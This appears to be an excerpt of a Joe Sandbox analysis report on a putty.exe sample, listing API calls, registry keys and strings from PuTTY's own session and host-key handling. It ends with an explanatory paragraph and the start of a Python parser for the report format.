                            • GetCurrentThread.KERNEL32 ref: 0044866C
                            • GetThreadTimes.KERNEL32(00000000), ref: 00448673
                            • GetCurrentProcess.KERNEL32(?,?,?,?), ref: 00448696
                            • GetProcessTimes.KERNEL32(00000000), ref: 0044869D
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: CurrentProcessStatusThreadTimes$CaptureClipboardCursorForegroundGlobalMemoryOwnerQueueWindow
                            • String ID:
                            • API String ID: 3596705544-0
                            • Opcode ID: 334f284826ee8275a2ba501602893a1e1eecde5e507d168153d268b351fb86fc
                            • Instruction ID: a6bf968ecdd9fd9ecb831d19aa1b31143a079992f9284a05cdd8afe14ea776cb
                            • Opcode Fuzzy Hash: 334f284826ee8275a2ba501602893a1e1eecde5e507d168153d268b351fb86fc
                            • Instruction Fuzzy Hash: B921CB73904318AADF05ABE1FD4ADDE77BCAB08715F50086BF211E6082EE35E2448B58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004455C8
                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00445666
                            • SetEvent.KERNEL32(?), ref: 00445678
                            • CloseHandle.KERNEL32(?), ref: 0044568A
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Event$CloseCreateHandleObjectSingleWait
                            • String ID:
                            • API String ID: 818936268-0
                            • Opcode ID: 16a5a687faf2d401437669605a7c224a9d468da220acc2b823e0f2ff074f4cf0
                            • Instruction ID: 2d2d70f9b46810ac9ff5cbb91ab50e3fa11c3864c17e4d6c0dfbc585808012cf
                            • Opcode Fuzzy Hash: 16a5a687faf2d401437669605a7c224a9d468da220acc2b823e0f2ff074f4cf0
                            • Instruction Fuzzy Hash: C021E771004B08AFEF205F64EC8492BBBE6FB58316F520A7EF44A81522D776E8448B19
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strrchr
                            • String ID: %02x$..\x11fwd.c$authtype == X11_XDM$local$localhost$unix$unix:%d
                            • API String ID: 3213747228-1204460085
                            • Opcode ID: 214faed630fe43195d6f91422b042dc3b786f37037d6f9538074b4a49a912234
                            • Instruction ID: 6d63eaeb422d3a2023a963b01669eeed8cccfbebd88a3bac6f37d0004792de19
                            • Opcode Fuzzy Hash: 214faed630fe43195d6f91422b042dc3b786f37037d6f9538074b4a49a912234
                            • Instruction Fuzzy Hash: CDC1B371504705EFEB20AF65D88192ABBF4EF04318B20483FF48AD6651EB38E941DB9D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CoCreateInstance.OLE32(0046C8B4,00000000,00000001,0046C904,?), ref: 00446028
                            • CoCreateInstance.OLE32(0046C8D4,00000000,00000001,0046C8E4,?), ref: 00446077
                            • _strlen.LIBCMT ref: 00446174
                            • CoCreateInstance.OLE32(0046C8D4,00000000,00000001,0046C8E4,?), ref: 004461CD
                            • _strlen.LIBCMT ref: 00446205
                            • CoCreateInstance.OLE32(0046C8D4,00000000,00000001,0046C8E4,?), ref: 0044625E
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: CreateInstance$_strlen
                            • String ID: Pageant.exe$Recent Sessions
                            • API String ID: 1547239670-148644000
                            • Opcode ID: ab8656c6939cbcf30946b4fcc8f61f8c4404330cea759f9321ffef0ece5ca7ad
                            • Instruction ID: 5c44d979eb094471b267fbbb8df8b6ab200fde430de6a9a027522bc4334cb18a
                            • Opcode Fuzzy Hash: ab8656c6939cbcf30946b4fcc8f61f8c4404330cea759f9321ffef0ece5ca7ad
                            • Instruction Fuzzy Hash: 6DB1DAB1A00209AFEF00DFE5C884DAEB7B9FF89704B2444AEE505E7251DB799D41CB25
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • MessageBoxA.USER32(00000000,Unsupported protocol number found,00000000,00000030), ref: 00441277
                              • Part of subcall function 004407DE: DeleteObject.GDI32(?), ref: 004407F9
                              • Part of subcall function 004407DE: CoUninitialize.OLE32 ref: 00440822
                            • MessageBoxA.USER32(00000000,?,00000000,00000010), ref: 00441340
                            • DeleteMenu.USER32(00000000,00000040,00000000), ref: 004413F8
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: DeleteMessage$MenuObjectUninitialize
                            • String ID: %s - %s$%s Error$%s Internal Error$Unable to open connection to%.800s%s$Unsupported protocol number found
                            • API String ID: 3527550427-1847621171
                            • Opcode ID: 799fb720463821c5e597b1719921aca563e2bef557c0d75b1dd284edc83ce840
                            • Instruction ID: 91c220b9814c69ecf87ee74ef6b137f93ba033230b7a1d16824125fa87e88f04
                            • Opcode Fuzzy Hash: 799fb720463821c5e597b1719921aca563e2bef557c0d75b1dd284edc83ce840
                            • Instruction Fuzzy Hash: F6419472804300BEEB216B61FD4AE5A3F6DEB04314B50407BF648661F2DABA5990CB9C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _wctomb_s.LIBCMT ref: 0043D14E
                            • _strlen.LIBCMT ref: 0043D15B
                            • _strlen.LIBCMT ref: 0043D166
                            • _strcat.LIBCMT ref: 0043D18B
                            • SendDlgItemMessageA.USER32(00000000,000003E9,00000180,00000000,00000000), ref: 0043D1D5
                            • SendDlgItemMessageA.USER32(000003E9,0000018B,00000000,00000000), ref: 0043D1E7
                            • SendDlgItemMessageA.USER32(000003E9,00000197,-00000001,00000000), ref: 0043D1F9
                              • Part of subcall function 0040B40A: _strcat.LIBCMT ref: 0040B457
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ItemMessageSend$_strcat_strlen$_wctomb_s
                            • String ID: %Y-%m-%d %H:%M:%S
                            • API String ID: 1366823462-819171244
                            • Opcode ID: b654e4ba05f03d3be0d92740d1d243aa7974cdbd63248eb1e0164576a6dff868
                            • Instruction ID: 52d7c710212c89ecb500d7928eaeb86e982d50ac82e04bf07611f02eef4b99a2
                            • Opcode Fuzzy Hash: b654e4ba05f03d3be0d92740d1d243aa7974cdbd63248eb1e0164576a6dff868
                            • Instruction Fuzzy Hash: DD31C476900204BBEB109BA5EC46FAABB79F784714F10003AFE04A71D1DB71BD81CB98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 0044965F
                            • RegCreateKeyA.ADVAPI32(80000001,Software\SimonTatham\PuTTY\Sessions,?), ref: 00449691
                            • RegCreateKeyA.ADVAPI32(?,00000000,?), ref: 004496BA
                            • RegCloseKey.ADVAPI32(?,?,00410E52,?,?,?,Default Settings,?,00403911,?,?), ref: 004496C1
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Create$Close_strlen
                            • String ID: Default Settings$Software\SimonTatham\PuTTY\Sessions$Unable to create registry keyHKEY_CURRENT_USER\%s$Unable to create registry keyHKEY_CURRENT_USER\%s\%s
                            • API String ID: 367641156-338366038
                            • Opcode ID: bd49674fbce9d6d9044216b5ea4ef43c091be9989045775553295a7d04c859a2
                            • Instruction ID: 4c09f4ddd1c8c60dfd5623c4e6037dcf4929ebb0cac32badd020dc445c46096f
                            • Opcode Fuzzy Hash: bd49674fbce9d6d9044216b5ea4ef43c091be9989045775553295a7d04c859a2
                            • Instruction Fuzzy Hash: DD11B772A04118BBDB117F659C45E9B3B9CDF44364F11403AF808A7292DB39DD4196AD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strcspn$_strlen
                            • String ID: 1.5$PuTTY-Release-0.63$SSH-%s-%s$SSH-2.0-%s$We claim version: %.*s
                            • API String ID: 3583553943-1350810802
                            • Opcode ID: 5e6ccdfdef0304cffe1e369c06da9ee4df542817cf9ef0b29e0fd4c3cb7cc473
                            • Instruction ID: cc384736df05ddbc3e49507be90a32a1275b4a147789e10eb6bc147d33d69a9a
                            • Opcode Fuzzy Hash: 5e6ccdfdef0304cffe1e369c06da9ee4df542817cf9ef0b29e0fd4c3cb7cc473
                            • Instruction Fuzzy Hash: 7A11C6F26553007AD2107B765D47E9B268CDF8071AF24482FF545A6283FABC989042ED
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CompareStringW.KERNEL32(00000000,00000000,00470560,00000001,00470560,00000001,00470B88,00000040,00453A31,00000001,00000014,00000000,00457BC4,00000000,?,0044EFD2), ref: 00455F24
                            • GetLastError.KERNEL32(?,0044EFD2,00000000,0000000A,00000000,00000000,00000000,00000014,00450EC7,004705B4,00000014,00000014,00408DF6,00000014,00000014), ref: 00455F36
                            • GetCPInfo.KERNEL32(?,0044DC1B,00470B88,00000040,00453A31,00000001,00000014,00000000,00457BC4,00000000,?,0044EFD2,00000000,0000000A,00000000,00000000), ref: 00455FE0
                            • MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000,?,0044EFD2,00000000,0000000A,00000000,00000000,00000000,00000014,00450EC7,004705B4), ref: 0045606E
                            • MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,?,00000000,?,0044EFD2,00000000,0000000A,00000000,00000000,00000000,00000014,00450EC7,004705B4), ref: 004560E7
                            • MultiByteToWideChar.KERNEL32(?,00000009,00408DF6,00000000,00000000,00000000,?,0044EFD2,00000000,0000000A,00000000,00000000,00000000,00000014,00450EC7,004705B4), ref: 00456104
                            • MultiByteToWideChar.KERNEL32(?,00000001,00408DF6,00000000,?,00000000,?,0044EFD2,00000000,0000000A,00000000,00000000,00000000,00000014,00450EC7,004705B4), ref: 0045617A
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$CompareErrorInfoLastString
                            • String ID:
                            • API String ID: 1773772771-0
                            • Opcode ID: 65fa1d29df0a7bfeef452c784cbba7e90fa284dcdcbd95ca45b73c9a590ab9a1
                            • Instruction ID: 5b4c58025cfc089470775f7ba816c4857ef9c6e7477da0b21a98a27e80f17cc5
                            • Opcode Fuzzy Hash: 65fa1d29df0a7bfeef452c784cbba7e90fa284dcdcbd95ca45b73c9a590ab9a1
                            • Instruction Fuzzy Hash: 0AB1BF31900609AFCF21DF54EC51AAE7BB5AF04712F65002BFC04A72A3DB39C994CB99
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00445468
                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 004454B7
                            • GetLastError.KERNEL32 ref: 004454C3
                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004454F1
                            • GetOverlappedResult.KERNEL32(?,00000000,?,00000000), ref: 004454FC
                            • GetLastError.KERNEL32 ref: 00445508
                            • SetEvent.KERNEL32(?), ref: 0044554A
                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0044555B
                            • CloseHandle.KERNEL32(?), ref: 00445577
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ErrorEventLastObjectSingleWait$CloseCreateFileHandleOverlappedReadResult
                            • String ID:
                            • API String ID: 4174623747-0
                            • Opcode ID: 7225e1b297f4fd90b4d7fd1216ac8a9122ab0e2d571c6ae293aa3c3d4540e4cb
                            • Instruction ID: 973d2059e86cdc8de87ea6a41a567adaca75e871bb00206b2259e18ae70d588b
                            • Opcode Fuzzy Hash: 7225e1b297f4fd90b4d7fd1216ac8a9122ab0e2d571c6ae293aa3c3d4540e4cb
                            • Instruction Fuzzy Hash: FC31EB71404B41AFFB205F24DC48777BBE5FF44326F104A3EF49944262D7789888CA19
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetCurrentProcessId.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00448A97,?,00000004), ref: 0044895F
                            • OpenProcess.KERNEL32(02000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00448A97,?,00000004), ref: 0044896C
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00448A97,?,00000004,?,?), ref: 004489A3
                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,00448A97,?,00000004,?), ref: 004489B3
                            • GetLengthSid.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00448A97,?,00000004,?,?), ref: 004489D8
                            • CopySid.ADVAPI32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00448A97,?,00000004), ref: 004489F0
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00448A97,?,00000004,?,?), ref: 00448A02
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00448A97,?,00000004,?,?), ref: 00448A12
                            • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00448A97,?,00000004,?,?), ref: 00448A1D
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: CloseHandleLocalProcess$AllocCopyCurrentErrorFreeLastLengthOpen
                            • String ID:
                            • API String ID: 621491157-0
                            • Opcode ID: 9332cf7c55524b73097e540cc3860dcdfb4f91a86f338aa6f6527fe60a58e792
                            • Instruction ID: b70982891dd109622ae9b23d150ea353af286a2d228cc89cb089c5161fb77a4f
                            • Opcode Fuzzy Hash: 9332cf7c55524b73097e540cc3860dcdfb4f91a86f338aa6f6527fe60a58e792
                            • Instruction Fuzzy Hash: 8C219371904204BFEB215FA5EC88EAFBBB9EB44741F10007AF505E11A1DF758E409B29
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetOEMCP.KERNEL32(00000000,00000000), ref: 00454815
                            • GetACP.KERNEL32(00000000,00000000), ref: 0045482C
                            • GetCPInfo.KERNEL32(?,?,00000000,00000000), ref: 0045487D
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Info
                            • String ID: @uG$@uG$PvG$PvG
                            • API String ID: 1807457897-1871059007
                            • Opcode ID: 8d99e815a405f24f0d20f40051118f7c6fdd3b8e9c76098e2960fddf062cb993
                            • Instruction ID: f5479fd8d45fea5a8e723d5a6bbf6d7e0d9f551ec1dc7e878e5fcad36a804fcf
                            • Opcode Fuzzy Hash: 8d99e815a405f24f0d20f40051118f7c6fdd3b8e9c76098e2960fddf062cb993
                            • Instruction Fuzzy Hash: 1B5105B080C1909FD710DF38D84526A7BA1AB8531AF64117BDD998F363C33949C9D78D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen_strncpy
                            • String ID: %d $%s%02x$gvE
                            • API String ID: 100186321-2632353272
                            • Opcode ID: 249467a1f632bc541fa0b5fa049bca795bd1d6c51149267e4efc4de37655f06d
                            • Instruction ID: d0bc9f89fd477ac4496138bf06b1123e8ed6d8460933010f56b6486c55246fb9
                            • Opcode Fuzzy Hash: 249467a1f632bc541fa0b5fa049bca795bd1d6c51149267e4efc4de37655f06d
                            • Instruction Fuzzy Hash: DE313C72500108BADB21ABB6EC85FDB77ACEF90344F54052FF91187112EA79E944C764
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strcspn.LIBCMT ref: 00445C9D
                            • WinHelpA.USER32(?,00000102,00000000), ref: 00445D1A
                            • WinHelpA.USER32(?,00000000,00000000,00000000), ref: 00445D5A
                              • Part of subcall function 0044C558: _strcat.LIBCMT ref: 0044C598
                              • Part of subcall function 0044C558: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000002), ref: 0044C5D6
                              • Part of subcall function 0044C558: _strcat.LIBCMT ref: 0044C5EC
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C5FC
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C60D
                              • Part of subcall function 0044C558: _strncpy.LIBCMT ref: 0044C628
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C665
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C67A
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$Help_strcat$FileModuleName_strcspn_strncpy
                            • String ID: %s::/%s.html>main$..\windows\winhelp.c$JI(`',`%.*s')$topic[colonpos] != '\0'
                            • API String ID: 215551812-2293147261
                            • Opcode ID: d6852fd11b2fed5f61b891f39962072be71134b2c0c6a4118e6bae1a3a0206f8
                            • Instruction ID: 022f134b0ebc277ea1498da0dad009fd2e49417a272957a72cb268e246d231ed
                            • Opcode Fuzzy Hash: d6852fd11b2fed5f61b891f39962072be71134b2c0c6a4118e6bae1a3a0206f8
                            • Instruction Fuzzy Hash: 3C21C0B2901654BFFB202F51EC8AD6B3B5EEB00395B56403BF90D52162E7396CC0CA9D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 00449D96
                            • _strlen.LIBCMT ref: 00449DA0
                              • Part of subcall function 00449B27: _strcat.LIBCMT ref: 00449B2C
                              • Part of subcall function 00449B27: _strlen.LIBCMT ref: 00449B3D
                              • Part of subcall function 00449B27: _strlen.LIBCMT ref: 00449B54
                            • RegCreateKeyA.ADVAPI32(80000001,Software\SimonTatham\PuTTY\SshHostKeys,?), ref: 00449DD5
                            • _strlen.LIBCMT ref: 00449DE2
                            • RegSetValueExA.ADVAPI32(00000001,00000000,00000000,00000001,?,00000001,?,?,?,?,?,?,?,?,?,?), ref: 00449DF5
                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00412E1F,00000000), ref: 00449DFE
                            Strings
                            • Software\SimonTatham\PuTTY\SshHostKeys, xrefs: 00449DCB
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$CloseCreateValue_strcat
                            • String ID: Software\SimonTatham\PuTTY\SshHostKeys
                            • API String ID: 3776462603-1465603940
                            • Opcode ID: 8e85a96a961799d64268339a8bbad728353d85ca53c45e6057d12b310205e3e1
                            • Instruction ID: a59d7cf3b0793a4c416ce381d071168a183b611c4092a5d690b3ae6bb56631be
                            • Opcode Fuzzy Hash: 8e85a96a961799d64268339a8bbad728353d85ca53c45e6057d12b310205e3e1
                            • Instruction Fuzzy Hash: FF017531400208BBDF116F91EC46EDF7B69EF04754F100476FD01650A2E7769E50AA98
                            Uniqueness

                            Uniqueness Score: -1.00%
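The function summaries above (API call list with captured arguments, "Part of subcall function" lines, the Strings section, and the Similarity fields) follow a fixed layout, which makes them easy to mine for the handful of calls an analyst actually cares about: here, the RegCreateKeyA to HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\SshHostKeys (PuTTY's own SSH host-key cache, so expected for a bundled putty.exe) and, in an earlier block, OpenProcess with a desired-access mask of 02000000. The following parser is an added example written for this page; it is not Joe Sandbox tooling. The SAMPLE text is a constructed excerpt copied and trimmed from two of the summaries on this page; the registry-root and MAXIMUM_ALLOWED constants are documented Windows values. Note that the argument lists are the stack slots the sandbox read at call time and often run past the real parameter count, so only the leading arguments are interpreted.

```python
import re
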